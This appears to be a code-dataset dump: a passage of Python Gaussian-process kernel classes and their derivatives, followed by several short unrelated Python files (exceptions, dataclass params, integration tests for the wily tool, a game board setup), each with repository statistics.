-np.log(r**2/(2*self.alpha*self.ell_e**2)+1)) \
*self.weight**2*exp(-2*sine(pi*np.abs(r)/self.P)**2/self.ell_p**2)) \
/(1+r**2/(2*self.alpha*self.ell_e**2))**self.alpha
class dRQP_delle(RQP):
"""
Log-derivative in order to ell_e
"""
def __init__(self, weight, alpha, ell_e, P, ell_p):
super(dRQP_delle, self).__init__(weight, alpha, ell_e, P, ell_p)
self.weight = weight
self.alpha = alpha
self.ell_e = ell_e
self.P = P
self.ell_p = ell_p
def __call__(self, r):
return (r**2*(1+r**2/(2*self.alpha*self.ell_e**2))**(-1-self.alpha) \
*self.weight**2 \
*exp(-2*sine(pi*np.abs(r)/self.P)**2/self.ell_p**2))/self.ell_e**2
class dRQP_dP(RQP):
"""
Log-derivative in order to P
"""
def __init__(self, weight, alpha, ell_e, P, ell_p):
super(dRQP_dP, self).__init__(weight, alpha, ell_e, P, ell_p)
self.weight = weight
self.alpha = alpha
self.ell_e = ell_e
self.P = P
self.ell_p = ell_p
def __call__(self, r):
return (4*pi*r*self.weight**2*cosine(pi*np.abs(r)/self.P)*sine(pi*np.abs(r)/self.P) \
*exp(-2*sine(pi*np.abs(r)/self.P)**2/self.ell_p**2)) \
/(self.ell_p**2*(1+r**2/(2*self.alpha*self.ell_e**2))^self.alpha*self.P)
class dRQP_dellp(RQP):
"""
Log-derivative in order to ell_p
"""
def __init__(self, weight, alpha, ell_e, P, ell_p):
super(dRQP_dellp, self).__init__(weight, alpha, ell_e, P, ell_p)
self.weight = weight
self.alpha = alpha
self.ell_e = ell_e
self.P = P
self.ell_p = ell_p
def __call(self, r):
return (4*self.weight**2*sine(pi*np.abs(r)/self.P)**2 \
*exp(-2*sine(pi*np.abs(r)/self.P)**2/self.ell_p**2)) \
/(self.ell_p**2*(1+r**2/(2*self.alpha*self.ell_e**2))**self.alpha)
##### Cosine ###################################################################
class Cosine(weightFunction):
"""
Definition of the cosine kernel.
Parameters:
weight = weight/amplitude of the kernel
P = period
"""
def __init__(self, weight, P):
super(Cosine, self).__init__(weight, P)
self.weight = weight
self.P = P
self.type = 'non-stationary and isotropic'
self.derivatives = 2 #number of derivatives in this kernel
self.params_size = 2 #number of hyperparameters
def __call__(self, r):
return self.weight**2 * cosine(2*pi*np.abs(r) / self.P)
class dCosine_dweight(Cosine):
"""
Log-derivative in order to the weight
"""
def __init__(self, weight, P):
super(dCosine_dweight, self).__init__(weight, P)
self.weight = weight
self.P = P
def __call__(self, r):
return 2 * self.weight**2 * cosine(2*pi*np.abs(r) / self.P)
class dCosine_dP(Cosine):
"""
Log-derivative in order to P
"""
def __init__(self, weight, P):
super(dCosine_dP, self).__init__(weight, P)
self.weight = weight
self.P = P
def __call__(self, r):
return self.weight**2 * r * pi * sine(2*pi*np.abs(r) / self.P) / self.P
##### Laplacian ##############################################################
class Laplacian(weightFunction):
"""
Definition of the Laplacian kernel.
Parameters:
weight = weight/amplitude of the kernel
ell = characteristic lenght scale
"""
def __init__(self, weight, ell):
super(Laplacian, self).__init__(weight, ell)
self.weight = weight
self.ell = ell
self.type = 'stationary and isotropic'
self.derivatives = 2 #number of derivatives in this kernel
self.params_size = 2 #number of hyperparameters
def __call__(self, r):
return self.weight**2 * exp(- np.abs(r)/self.ell)
class dLaplacian_dweight(Laplacian):
"""
Log-derivative in order to the weight
"""
def __init__(self, weight, ell):
super(dLaplacian_dweight, self).__init__(weight, ell)
self.weight = weight
self.ell = ell
def __call__(self, r):
return 2 * self.weight**2 * exp(- np.abs(r)/self.ell)
class dLaplacian_dell(Laplacian):
"""
Log-derivative in order to ell
"""
def __init__(self, weight, ell):
super(dLaplacian_dell, self).__init__(weight, ell)
self.weight = weight
self.ell = ell
def __call__(self, r):
return -0.5 * self.weight**2 * r * exp(- np.abs(r)/self.ell) / self.ell
##### Exponential ##############################################################
class Exponential(weightFunction):
"""
Definition of the exponential kernel. This kernel arises when
setting v=1/2 in the matern family of kernels
Parameters:
weight = weight/amplitude of the kernel
ell = characteristic lenght scale
"""
def __init__(self, weight, ell):
super(Exponential, self).__init__(weight, ell)
self.weight = weight
self.ell = ell
self.type = 'stationary and isotropic'
self.derivatives = 2 #number of derivatives in this kernel
self.params_size = 2 #number of hyperparameters
def __call__(self, r):
return self.weight**2 * exp(- np.abs(r)/self.ell)
class dExponential_dweight(Exponential):
"""
Log-derivative in order to the weight
"""
def __init__(self, weight, ell):
super(dExponential_dweight, self).__init__(weight, ell)
self.weight = weight
self.ell = ell
def __call__(self, r):
raise NotImplementedError
class dExpoential_dell(Exponential):
"""
Log-derivative in order to ell
"""
def __init__(self, weight, ell):
super(dExpoential_dell, self).__init__(weight, ell)
self.weight = weight
self.ell = ell
def __call__(self, r):
raise NotImplementedError
##### Matern 3/2 ###############################################################
class Matern32(weightFunction):
"""
Definition of the Matern 3/2 kernel. This kernel arise when setting
v=3/2 in the matern family of kernels
Parameters:
weight = weight/amplitude of the kernel
ell = characteristic lenght scale
"""
def __init__(self, weight, ell):
super(Matern32, self).__init__(weight, ell)
self.weight = weight
self.ell = ell
self.type = 'stationary and isotropic'
self.derivatives = 2 #number of derivatives in this kernel
self.params_size = 2 #number of hyperparameters
def __call__(self, r):
return self.weight**2 *(1.0 + np.sqrt(3.0)*np.abs(r)/self.ell) \
*np.exp(-np.sqrt(3.0)*np.abs(r) / self.ell)
class dMatern32_dweight(Matern32):
"""
Log-derivative in order to the weight
"""
def __init__(self, weight, ell):
super(dMatern32_dweight, self).__init__(weight, ell)
self.weight = weight
self.ell = ell
def __call__(self, r):
return 2 * self.weight**2 *(1.0 + np.sqrt(3.0)*np.abs(r)/self.ell) \
*np.exp(-np.sqrt(3.0)*np.abs(r) / self.ell)
class dMatern32_dell(Matern32):
"""
Log-derivative in order to ell
"""
def __init__(self, weight, ell):
super(dMatern32_dell, self).__init__(weight, ell)
self.weight = weight
self.ell = ell
def __call__(self, r):
return (sqrt(3) * r * (1+ (sqrt(3) * r) / self.ell) \
*exp(-(sqrt(3)*r) / self.ell) * self.weight**2) / self.ell \
-(sqrt(3) * r * exp(-(sqrt(3)*r) / self.ell)*self.weight**2)/self.ell
#### Matern 5/2 ################################################################
class Matern52(weightFunction):
"""
Definition of the Matern 5/2 kernel. This kernel arise when setting
v=5/2 in the matern family of kernels
Parameters:
weight = weight/amplitude of the kernel
ell = characteristic lenght scale
"""
def __init__(self, weight, ell):
super(Matern52, self).__init__(weight, ell)
self.weight = weight
self.ell = ell
self.type = 'stationary and isotropic'
self.derivatives = 2 #number of derivatives in this kernel
self.params_size = 2 #number of hyperparameters
def __call__(self, r):
return self.weight**2 * (1.0 + ( 3*np.sqrt(5)*self.ell*np.abs(r) \
+5*np.abs(r)**2)/(3*self.ell**2) ) \
*exp(-np.sqrt(5.0)*np.abs(r)/self.ell)
class dMatern52_dweight(Matern52):
"""
Log-derivative in order to the weight
"""
def __init__(self, weight, ell):
super(dMatern52_dweight, self).__init__(weight, ell)
self.weight = weight
self.ell = ell
def __call__(self, r):
return 2 * self.weight**2 * (1.0 + ( 3*np.sqrt(5)*self.ell*np.abs(r) \
+5*np.abs(r)**2)/(3*self.ell**2) ) \
*exp(-np.sqrt(5.0)*np.abs(r)/self.ell)
class dMatern52_dell(Matern52):
"""
Log-derivative in order to ell
"""
def __init__(self, weight, ell):
super(dMatern52_dell, self).__init__(weight, ell)
self.weight = weight
self.ell = ell
def __call__(self, r):
return self.ell * ((sqrt(5)*r*(1+(sqrt(5)*r) \
/self.ell+(5*r**2)/(3*self.ell**2)) \
*exp(-(sqrt(5)*r)/self.ell)*self.weight**2) \
/self.ell**2 +(-(sqrt(5)*r)/self.ell**2-(10*r**2) \
/(3*self.ell**3)) \
*exp(-(sqrt(5)*r)/self.ell)*self.weight**2)
#### Linear ####################################################################
class Linear(weightFunction):
"""
Definition of the Linear kernel.
weight = weight/amplitude of the kernel
c = constant
"""
def __init__(self, weight, c):
super(Linear, self).__init__(weight, c)
self.weight = weight
self.c = c
self.type = 'non-stationary and anisotropic'
self.derivatives = 2 #number of derivatives in this kernel
self.params_size = 2 #number of hyperparameters
def __call__(self, r, t1, t2):
return self.weight**2 * (t1 - self.c) * (t2 - self.c)
class dLinear_dweight(Linear):
"""
Log-derivative in order to the weight
"""
def __init__(self, weight, c):
super(dLinear_dweight, self).__init__(weight, c)
self.weight = weight
self.c = c
def __call__(self, r, t1, t2):
return 2 * self.weight**2 * (t1 - self.c) * (t2 - self.c)
class dLinear_dc(Linear):
"""
Log-derivative in order to c
"""
def __init__(self, weight, c):
super(dLinear_dc, self).__init__(weight, c)
self.weight = weight
self.c = c
def __call__(self, r, t1, t2):
return self.c * (-t1 - t2 + 2*self.c) * self.weight**2
##### Gamma-exponential ########################################################
class GammaExp(weightFunction):
"""
Definition of the gamma-exponential kernel
weight = weight/amplitude
gamma = shape parameter ( 0 < gamma <= 2)
ell = lenght scale
"""
def __init__(self, weight, gamma, ell):
super(GammaExp, self).__init__(weight, gamma, ell)
self.weight = weight
self.gamma = gamma
self.ell = ell
self.type = 'non-stationary and anisotropic'
self.derivatives = 3 #number of derivatives in this kernel
self.params_size = 3 #number of hyperparameters
def __call__(self, r):
return self.weight**2 * exp( -(np.abs(r)/self.ell)**self.gamma)
class dGammaExp_dweight(Linear):
"""
Log-derivative in order to the weight
"""
def __init__(self, weight, gamma, ell):
super(dGammaExp_dweight, self).__init__(weight, gamma, ell)
self.weight = weight
self.gamma = gamma
self.ell = ell
def __call__(self, r, t1, t2):
return 2 * self.weight**2 * exp( -(np.abs(r)/self.ell)**self.gamma)
class dGammaExp_dgamma(GammaExp):
"""
Log-derivative in order to ell
"""
def __init__(self, weight, gamma, ell):
super(dGammaExp_dgamma, self).__init__(weight, gamma, ell)
self.weight = weight
self.gamma = gamma
self.ell = ell
def __call__(self, r):
return -self.weight**2 * self.gamma * (np.abs(r)/self.ell)**self.gamma \
*np.log(np.abs(r)/self.ell) * exp(-(np.abs(r)/self.ell)**self.gamma)
class dGammaExp_dell(GammaExp):
"""
Log-derivative in order to gamma
"""
def __init__(self, weight, gamma, ell):
super(dGammaExp_dell, self).__init__(weight, gamma, ell)
self.weight = weight
self.gamma = gamma
self.ell = ell
def __call__(self, r):
return self.weight**2 * (np.abs(r)/self.ell)**self.gamma \
* self.gamma*exp(-(np.abs(r)/self.ell)**self.gamma)
##### Polinomial ###############################################################
class Polynomial(weightFunction):
"""
Definition of the polinomial kernel
weight = weight/amplitude
a = real value > 0
b = real value >= 0
c = integer value
"""
def __init__(self, weight, a, b, c):
super(Polynomial, self).__init__(weight, a, b, c)
self.weight = weight
self.a = a
self.b = b
self.c = c
def __call__(self, r, t1, t2):
return self.weight**2 * (self.a * t1 * t2 + self.b)**self.c
class dPolynomial_dweight(Polynomial):
"""
Log-derivative in order to the weight
"""
def __init__(self, weight, a, b, c):
super(dPolynomial_dweight, self).__init__(weight, a, b, c)
self.weight = weight
self.a = a
self.b = b
self.c = c
def __call__(self, r, t1, t2):
return 2 * self.weight**2 * (self.a * t1 * t2 + self.b)**self.c
class dPolynomial_da(Polynomial):
"""
Log-derivative in order to a
"""
def __init__(self, weight, a, b, c):
super(dPolynomial_da, self).__init__(weight, a, b, c)
self.weight = weight
self.a = a
self.b = b
self.c = c
def __call__(self, r, t1, t2):
return self.weight**2 * self.a * self.c * t1 * t2 \
* (self.b + self.a * t1 * t2)**(self.c-1)
class dPolynomial_db(Polynomial):
"""
Log-derivative in order to b
"""
def __init__(self, weight, a, b, c):
super(dPolynomial_db, self).__init__(weight, a, b, c)
self.weight = weight
self.a = a
self.b = b
self.c = c
def __call__(self, r, t1, t2):
return self.weight**2 * self.c * self.b \
* (self.b +self.a * t1 * t2)**(self.c-1)
class dPolynomial_dc(Polynomial):
"""
Log-derivative in order to c
"""
def __init__(self, weight, a, b, c):
super(dPolynomial_dc, self).__init__(weight, a, b, c)
self.weight = weight
self.a = a
self.b = b
self.c = c
def __call__(self, r, t1, t2):
return self.weight**2 * self.c * (self.b + self.a * t1 * t2)**self.c \
* np.log(self.a * t1 * t2 + self.b)
##### END
| 33.152941
| 93
| 0.550068
| 4,067
| 30,998
| 3.974182
| 0.060241
| 0.090948
| 0.037431
| 0.040834
| 0.804244
| 0.786797
| 0.745777
| 0.71014
| 0.675803
| 0.650374
| 0
| 0.01926
| 0.29147
| 30,998
| 934
| 94
| 33.188437
| 0.71666
| 0.200142
| 0
| 0.629278
| 0
| 0
| 0.016794
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.207224
| false
| 0
| 0.001901
| 0.095057
| 0.412548
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
990209ed802758743759275aaf265855b1eea4b4
| 373
|
py
|
Python
|
src/kgmk/jstage/paper_list/params.py
|
kagemeka/python
|
486ce39d97360b61029527bacf00a87fdbcf552c
|
[
"MIT"
] | null | null | null |
src/kgmk/jstage/paper_list/params.py
|
kagemeka/python
|
486ce39d97360b61029527bacf00a87fdbcf552c
|
[
"MIT"
] | null | null | null |
src/kgmk/jstage/paper_list/params.py
|
kagemeka/python
|
486ce39d97360b61029527bacf00a87fdbcf552c
|
[
"MIT"
] | null | null | null |
import typing
import dataclasses
# TODO get paper list
@dataclasses.dataclass
class Params():
service: typing.Final[int] = 2
pubyearfrom: typing.Optional[int] = None
pubyearto: typing.Optional[int] = None
material: typing.Optional[str] = None
issn: typing.Optional[str] = None
cdjournal: typing.Optional[int] = None
volorder: typing.Optional[int] = None
| 23.3125
| 42
| 0.731903
| 47
| 373
| 5.808511
| 0.489362
| 0.307692
| 0.249084
| 0.307692
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.003185
| 0.158177
| 373
| 15
| 43
| 24.866667
| 0.866242
| 0.050938
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.066667
| 0
| 1
| 0
| true
| 0
| 0.181818
| 0
| 0.909091
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
|
0
| 6
|
54cf8597b5093947e6e488398235ab3cf8166ad3
| 37
|
py
|
Python
|
max_ent/optim/__init__.py
|
aloreggia/sofai
|
92694f9372985c0c3a23d695f1de4c4a1fb70728
|
[
"MIT"
] | null | null | null |
max_ent/optim/__init__.py
|
aloreggia/sofai
|
92694f9372985c0c3a23d695f1de4c4a1fb70728
|
[
"MIT"
] | 1
|
2021-05-25T14:57:15.000Z
|
2021-05-25T14:57:15.000Z
|
max_ent/optim/__init__.py
|
Rahgooy/soft_constraint_irl
|
259d4e7aff5ec8efe78cfbe8b84e9285d4645618
|
[
"MIT"
] | null | null | null |
from max_ent.optim.optimizer import *
| 37
| 37
| 0.837838
| 6
| 37
| 5
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.081081
| 37
| 1
| 37
| 37
| 0.882353
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
54faad68c77f469541ee3c3368f0e14b0167a8e1
| 44
|
py
|
Python
|
facs/__init__.py
|
SciLifeLab/facs
|
4b8eeed824b2fc35989e10526249e2fc1bad90cf
|
[
"MIT"
] | 5
|
2015-01-21T16:49:38.000Z
|
2016-04-06T01:29:47.000Z
|
facs/__init__.py
|
SciLifeLab/facs
|
4b8eeed824b2fc35989e10526249e2fc1bad90cf
|
[
"MIT"
] | 3
|
2015-11-11T14:28:38.000Z
|
2015-12-17T20:39:50.000Z
|
facs/__init__.py
|
SciLifeLab/facs
|
4b8eeed824b2fc35989e10526249e2fc1bad90cf
|
[
"MIT"
] | 3
|
2015-12-17T04:11:47.000Z
|
2016-03-10T02:01:27.000Z
|
from facs._facs import build, query, remove
| 22
| 43
| 0.795455
| 7
| 44
| 4.857143
| 0.857143
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.136364
| 44
| 1
| 44
| 44
| 0.894737
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
071109f27d68a5c1b5cc7d653404b59ad55be94b
| 195
|
py
|
Python
|
active_semi_clustering/__init__.py
|
heriosousa/active-semi-supervised-clustering
|
8ed97c7f3bdd76cf6c03e0ca6ef56bcf27b2d399
|
[
"MIT"
] | 67
|
2018-11-09T06:59:31.000Z
|
2021-11-04T06:54:36.000Z
|
active_semi_clustering/__init__.py
|
heriosousa/active-semi-supervised-clustering
|
8ed97c7f3bdd76cf6c03e0ca6ef56bcf27b2d399
|
[
"MIT"
] | 5
|
2020-03-24T18:10:32.000Z
|
2021-06-02T01:08:20.000Z
|
active_semi_clustering/__init__.py
|
heriosousa/active-semi-supervised-clustering
|
8ed97c7f3bdd76cf6c03e0ca6ef56bcf27b2d399
|
[
"MIT"
] | 29
|
2018-10-16T15:36:28.000Z
|
2021-11-20T10:09:41.000Z
|
from .semi_supervised.labeled_data import KMeans, SeededKMeans, ConstrainedKMeans
from .semi_supervised.pairwise_constraints import COPKMeans, PCKMeans, MPCKMeans, MPCKMeansMF, MKMeans, RCAKMeans
| 97.5
| 113
| 0.871795
| 21
| 195
| 7.904762
| 0.809524
| 0.096386
| 0.216867
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.071795
| 195
| 2
| 113
| 97.5
| 0.917127
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
0768ef20c205a8e1297fe58cbc25150f9b738c80
| 428
|
py
|
Python
|
backend/errors.py
|
89erik/localbank
|
7fcfca4ed81cabcb92a48540b8cbc4f0f028e867
|
[
"MIT"
] | null | null | null |
backend/errors.py
|
89erik/localbank
|
7fcfca4ed81cabcb92a48540b8cbc4f0f028e867
|
[
"MIT"
] | 12
|
2018-09-08T18:17:37.000Z
|
2019-03-02T10:18:05.000Z
|
backend/errors.py
|
89erik/localbank
|
7fcfca4ed81cabcb92a48540b8cbc4f0f028e867
|
[
"MIT"
] | null | null | null |
class ApiException(Exception):
pass
class Forbidden(ApiException):
def __init__(self, message):
self.message = message
self.status_code = 403
class NotFound(ApiException):
def __init__(self, message):
self.message = message
self.status_code = 404
class BadRequest(ApiException):
def __init__(self, message):
self.message = message
self.status_code = 400
| 25.176471
| 32
| 0.658879
| 46
| 428
| 5.804348
| 0.347826
| 0.247191
| 0.213483
| 0.258427
| 0.696629
| 0.696629
| 0.696629
| 0.696629
| 0.696629
| 0.696629
| 0
| 0.028302
| 0.257009
| 428
| 17
| 33
| 25.176471
| 0.811321
| 0
| 0
| 0.428571
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.214286
| false
| 0.071429
| 0
| 0
| 0.5
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 6
|
4af18160b6cf71aec1f976b2a079ade28db922dc
| 4,960
|
py
|
Python
|
test/integration/test_diff.py
|
DahlitzFlorian/wily
|
069c26bff9741b49420e3cfd7b0954ac9b88cc3f
|
[
"Apache-2.0"
] | null | null | null |
test/integration/test_diff.py
|
DahlitzFlorian/wily
|
069c26bff9741b49420e3cfd7b0954ac9b88cc3f
|
[
"Apache-2.0"
] | null | null | null |
test/integration/test_diff.py
|
DahlitzFlorian/wily
|
069c26bff9741b49420e3cfd7b0954ac9b88cc3f
|
[
"Apache-2.0"
] | null | null | null |
import pathlib
from textwrap import dedent
from click.testing import CliRunner
import wily.__main__ as main
def test_diff_no_cache(tmpdir):
runner = CliRunner()
result = runner.invoke(main.cli, ["--path", tmpdir, "diff", "src/test.py"])
assert result.exit_code == 1, result.stdout
def test_diff_no_path(tmpdir):
runner = CliRunner()
result = runner.invoke(main.cli, ["--path", tmpdir, "diff"])
assert result.exit_code == 2, result.stdout
def test_diff_output(builddir):
""" Test the diff feature with no changes """
runner = CliRunner()
result = runner.invoke(
main.cli, ["--debug", "--path", builddir, "diff", "src/test.py"]
)
assert result.exit_code == 0, result.stdout
assert "test.py" not in result.stdout
def test_diff_output_all(builddir):
""" Test the diff feature with no changes and the --all flag """
runner = CliRunner()
result = runner.invoke(
main.cli, ["--debug", "--path", builddir, "diff", "src/test.py", "--all"]
)
assert result.exit_code == 0, result.stdout
assert "test.py" in result.stdout
def test_diff_output_bad_path(builddir):
""" Test the diff feature with no changes """
runner = CliRunner()
result = runner.invoke(
main.cli, ["--debug", "--path", builddir, "diff", "src/baz.py"]
)
assert result.exit_code == 0, result.stdout
assert "test.py" not in result.stdout
def test_diff_output_remove_all(builddir):
""" Test the diff feature by removing all functions and classes """
with open(pathlib.Path(builddir) / "src" / "test.py", "w") as test_py:
test_py.write("print(1)")
runner = CliRunner()
result = runner.invoke(
main.cli, ["--debug", "--path", builddir, "diff", "src/test.py", "--all"]
)
assert result.exit_code == 0, result.stdout
def test_diff_output_more_complex(builddir):
""" Test the diff feature by making the test file more complicated """
complex_test = """
import abc
foo = 1
def function1():
a = 1 + 1
if a == 2:
print(1)
class Class1(object):
def method(self):
b = 1 + 5
if b == 6:
if 1==2:
if 2==3:
print(1)
"""
with open(pathlib.Path(builddir) / "src" / "test.py", "w") as test_py:
test_py.write(dedent(complex_test))
runner = CliRunner()
result = runner.invoke(
main.cli, ["--debug", "--path", builddir, "diff", "src/test.py", "--all"]
)
assert result.exit_code == 0, result.stdout
assert "test.py" in result.stdout
assert "- -> -" not in result.stdout
assert "-> -" not in result.stdout
assert "- ->" not in result.stdout
def test_diff_output_less_complex(builddir):
""" Test the diff feature by making the test file more complicated """
simple_test = """
import abc
foo = 1
def function1():
pass
class Class1(object):
def method(self):
pass
"""
with open(pathlib.Path(builddir) / "src" / "test.py", "w") as test_py:
test_py.write(dedent(simple_test))
runner = CliRunner()
result = runner.invoke(
main.cli, ["--debug", "--path", builddir, "diff", "src/test.py", "--all"]
)
assert result.exit_code == 0, result.stdout
assert "test.py" in result.stdout
assert "- -> -" not in result.stdout
assert "-> -" not in result.stdout
assert "- ->" not in result.stdout
def test_diff_output_loc(builddir):
""" Test the diff feature by making the test file more complicated """
simple_test = """print("test")"""
with open(pathlib.Path(builddir) / "src" / "test.py", "w") as test_py:
test_py.write(dedent(simple_test))
runner = CliRunner()
result = runner.invoke(
main.cli,
["--debug", "--path", builddir, "diff", "src/test.py", "--metrics", "raw.loc"],
)
assert result.exit_code == 0, result.stdout
assert "test.py" in result.stdout
assert "10 -> \x1b[33m1\x1b[0m" in result.stdout # 10 -> 1 (in green)
def test_diff_output_rank(builddir):
""" Test the diff feature by making the test file more complicated """
simple_test = """print("test")"""
with open(pathlib.Path(builddir) / "src" / "test.py", "w") as test_py:
test_py.write(dedent(simple_test))
runner = CliRunner()
result = runner.invoke(
main.cli,
[
"--debug",
"--path",
builddir,
"diff",
"src/test.py",
"--all",
"--metrics",
"maintainability.rank",
],
)
assert result.exit_code == 0, result.stdout
assert "test.py" in result.stdout
assert "A -> A" in result.stdout
| 29.700599
| 87
| 0.569758
| 616
| 4,960
| 4.482143
| 0.13961
| 0.065194
| 0.097791
| 0.097791
| 0.862369
| 0.854038
| 0.803332
| 0.777617
| 0.752988
| 0.752988
| 0
| 0.011277
| 0.284879
| 4,960
| 166
| 88
| 29.879518
| 0.767127
| 0.095161
| 0
| 0.581967
| 0
| 0
| 0.252534
| 0
| 0
| 0
| 0
| 0
| 0.204918
| 1
| 0.081967
| false
| 0.016393
| 0.04918
| 0
| 0.131148
| 0.040984
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
ab040eb7dd3252c6997195933e5fd19ac912f428
| 1,557
|
py
|
Python
|
DebugMode.py
|
DanielPri/XrudderAI
|
5c3e690c24511c05a205387431896cb5880e4b33
|
[
"MIT"
] | null | null | null |
DebugMode.py
|
DanielPri/XrudderAI
|
5c3e690c24511c05a205387431896cb5880e4b33
|
[
"MIT"
] | null | null | null |
DebugMode.py
|
DanielPri/XrudderAI
|
5c3e690c24511c05a205387431896cb5880e4b33
|
[
"MIT"
] | 1
|
2021-03-24T02:50:45.000Z
|
2021-03-24T02:50:45.000Z
|
from TileColor import TileColor
def set_board(board, p1, p2):
board.get_tile("A", 5).set_color(TileColor.WHITE)
board.get_tile("A", 3).set_color(TileColor.WHITE)
board.get_tile("B", 4).set_color(TileColor.WHITE)
board.get_tile("C", 1).set_color(TileColor.WHITE)
board.get_tile("C", 3).set_color(TileColor.WHITE)
board.get_tile("D", 5).set_color(TileColor.WHITE)
board.get_tile("F", 5).set_color(TileColor.WHITE)
board.get_tile("G", 5).set_color(TileColor.WHITE)
board.get_tile("J", 1).set_color(TileColor.WHITE)
board.get_tile("J", 3).set_color(TileColor.WHITE)
board.get_tile("K", 2).set_color(TileColor.WHITE)
board.get_tile("L", 1).set_color(TileColor.WHITE)
p1.played_pieces = ["A5", "A3", "B4", "C1", "C3", "D5", "F5", "G5", "J1", "J3", "K2", "L1"]
board.get_tile("A", 2).set_color(TileColor.BLACK)
board.get_tile("C", 2).set_color(TileColor.BLACK)
board.get_tile("D", 4).set_color(TileColor.BLACK)
board.get_tile("D", 6).set_color(TileColor.BLACK)
board.get_tile("E", 5).set_color(TileColor.BLACK)
board.get_tile("F", 4).set_color(TileColor.BLACK)
board.get_tile("F", 6).set_color(TileColor.BLACK)
board.get_tile("G", 4).set_color(TileColor.BLACK)
board.get_tile("G", 6).set_color(TileColor.BLACK)
board.get_tile("H", 5).set_color(TileColor.BLACK)
board.get_tile("J", 2).set_color(TileColor.BLACK)
board.get_tile("I", 4).set_color(TileColor.BLACK)
p2.played_pieces = ["A2", "C2", "D4", "D6", "E5", "F4", "F6", "G4", "G6", "H5", "J2", "I4"]
| 43.25
| 95
| 0.667309
| 256
| 1,557
| 3.859375
| 0.222656
| 0.194332
| 0.291498
| 0.267206
| 0.834008
| 0.787449
| 0.787449
| 0.753036
| 0
| 0
| 0
| 0.038179
| 0.125241
| 1,557
| 35
| 96
| 44.485714
| 0.687225
| 0
| 0
| 0
| 0
| 0
| 0.046302
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.035714
| false
| 0
| 0.035714
| 0
| 0.071429
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
db58e9775cd7928a4dbea941aa73c24dfa9b47ad
| 29
|
py
|
Python
|
torch_tools/data/augment/__init__.py
|
gregunz/TorchTools
|
19a33f2e4cd38f86b74bd732949516df66f9e24f
|
[
"MIT"
] | null | null | null |
torch_tools/data/augment/__init__.py
|
gregunz/TorchTools
|
19a33f2e4cd38f86b74bd732949516df66f9e24f
|
[
"MIT"
] | null | null | null |
torch_tools/data/augment/__init__.py
|
gregunz/TorchTools
|
19a33f2e4cd38f86b74bd732949516df66f9e24f
|
[
"MIT"
] | null | null | null |
from .randaug import RandAug
| 14.5
| 28
| 0.827586
| 4
| 29
| 6
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.137931
| 29
| 1
| 29
| 29
| 0.96
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
